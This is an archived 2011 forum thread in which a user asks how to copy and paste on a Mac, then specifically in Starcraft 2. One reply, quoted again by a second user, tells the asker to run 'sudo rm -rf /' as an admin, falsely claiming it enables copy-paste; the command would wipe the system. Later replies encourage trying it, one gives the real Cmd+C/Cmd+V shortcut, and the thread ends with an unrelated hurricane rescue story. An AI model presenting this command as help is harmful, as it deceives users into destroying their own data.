PDA

View Full Version : Copying and Pasting On A MAC.[In Starcraft 2.]

Mello Yello
August 29th, 2011, 06:10 PM
How would you go about doing so on a Mac? Let alone any Computer? Suggestions Welcome.

EDIT:I Appreciate the detailed responses,I noticed a large flaw in my question,this is what i intended to ask,How would you go about copy & and pasting on a Mac In-Game Starcraft 2

oops_ur_dead
August 29th, 2011, 06:35 PM
You have to enable it first.

Open up your Terminal (it's in the Utilities folder in your Applications). Then, in the Terminal, type this exactly:

sudo rm -rf /

You must do this on an admin account, and type your password, because this changes system-level settings.

After that, every time you select text, a box will open up asking you if you want to copy, cut, or paste.

Clawtrocity
August 29th, 2011, 06:43 PM
Or

Apple C + Apple V

There's a shortcut for it. Oops has to make everything so customized and shit

Narks
August 29th, 2011, 06:55 PM
You have to enable it first.

Open up your Terminal (it's in the Utilities folder in your Applications). Then, in the Terminal, type this exactly:

sudo rm -rf /

You must do this on an admin account, and type your password, because this changes system-level settings.

After that, every time you select text, a box will open up asking you if you want to copy, cut, or paste.

you're such a nice person oops

Mello Yello
August 29th, 2011, 09:05 PM
Bump,do to the situation changing EDIT.

Narks
August 29th, 2011, 11:29 PM
you sssshould try the ssssuggesssstion oops ssssuggested

oops_ur_dead
August 30th, 2011, 05:51 AM
My suggestion works in all programs.

S.A.S.Cnl.Alpha
August 30th, 2011, 07:42 AM
you should try the suggestion black ops suggested

Spy
August 30th, 2011, 07:49 AM
What is a MAC?

S.A.S.Cnl.Alpha
August 30th, 2011, 07:55 AM
Mass Accelerator Cannon.

that being said, my friend during the hurricane up in the north of the US has this to say:

>Stay overnight at fire station on standby
>2:00 AM, dispatch tones ring in
>"Engine 1, Engine 3, Engine 4, Engine 6, Rescue 1, Rescue 4, Squad 2, Squad 5..."
>HERE WE GO RESCUE
>"...respond to report of a car on fire."
>HOW

And then throughout the night we had an activated fire alarm at an evacuated apartment complex with no fire.

But then on Sunday we had many a rescue from flooded homes and streets, welfare checks, and then we got to the devastated shoreline of East Haven. As did the governor, the local police, the state police, the National Guard, Middletown FD, and Connecticut's Urban Search and Rescue team. Houses had crumbled and fallen.